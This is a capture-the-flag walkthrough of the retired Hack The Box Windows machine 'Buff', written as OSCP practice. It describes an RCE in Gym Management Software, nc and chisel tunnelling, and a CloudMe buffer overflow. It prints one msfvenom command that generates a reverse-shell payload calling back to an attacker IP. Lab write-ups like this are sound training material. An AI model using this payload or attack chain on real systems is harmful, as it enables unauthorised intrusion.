OSCP PREPROTİONS – HTB Buff

Buff machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, ports 7680/tcp pando-pub and 8080/tcp http Apache 2.4.43 are open.
We provide enumeration on port 8080.

We did not get any results in the source code, but if we look at its general appearance, we understand that it is a website about Fitness.
We scan with gobuster for hidden files and directories.

We didn’t find anything in the scan result.
Continue enumeration from the web interface

Made using Gym Management Software 1.0, let’s search if there is a vulnerability related to it

We’ve seen the RCE vulnerability here. Let’s pull this into our local machine and see

There is nothing we can change on the code, let’s use it.

gave us Shell on user buff\shaun
here but we can’t get a stable Shell, we can’t change directories etc.
Let’s install nc here and try to give ourselves a stable shel
here when we give our smbshare without password, it did not accept it, we cannot use it in powershelli

Therefore we will create a password username with smbshare.

We successfully copied the nc
Now it’s time to run nc and get revershell

We have our shell, we have obtained the user flag, but we cannot access the administrtor folder, so we continue local enumuraion.

Download Winpeas.exe

Here we understand that CloudMe_1112.exe is running inside.
(CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software).
Let’s see if there is a vulnerability related to this

We have seen that there are vulnerabilities with the same version of CloudMe exe’s name, but they are python, but I need python in windows to use them, but it does not come by default in windows, so we will use port forwarding management.
We transferred the chisel to the target machine

Let’s do port forwarding from Chisel

We have done our port forwarding and now it is time to list the exploits belonging to CloudMe.

Here we’ll download the PoC exploit and edit it.

As you can see here it opens the calculator and we want something more, namely to give us revershell.
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4700 -b ‘\x00\x0A\x0D’ -f python -v payload
here we create with msfvenom

We update the existing exploit. We use the payload we got.
I’ll add the payload and put Shell on standby.

And we got Shell from the administrator user
This is how we got our root flag.